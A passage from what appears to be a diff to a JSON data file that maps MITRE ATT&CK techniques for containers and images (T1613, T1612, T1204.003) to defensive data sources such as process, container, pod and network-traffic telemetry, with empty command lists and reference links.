"Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1613", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "cluster", + "definition": "Information about a cluster within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "cluster metadata", + "description": "Data and information that describe a cluster and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "cluster" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container enumeration", + "description": "Containers were listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "containers" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container metadata", + "description": "Data and information that describe a container and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "container" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod enumeration", + "description": "Pods were listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "pods" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod metadata", + "description": "Data and information that describe a pod and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "pod" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://kubernetes.io/docs/concepts/cluster-administration/", + "https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info" + ], + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://kubernetes.io/docs/reference/kubectl/kubectl/", + "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1612", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image creation", + "description": "An image was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "image" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + null + ] + }, + { + "technique_id": "T1204.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container start", + "description": "A container was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "container" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image creation", + "description": "An image was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "image" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance 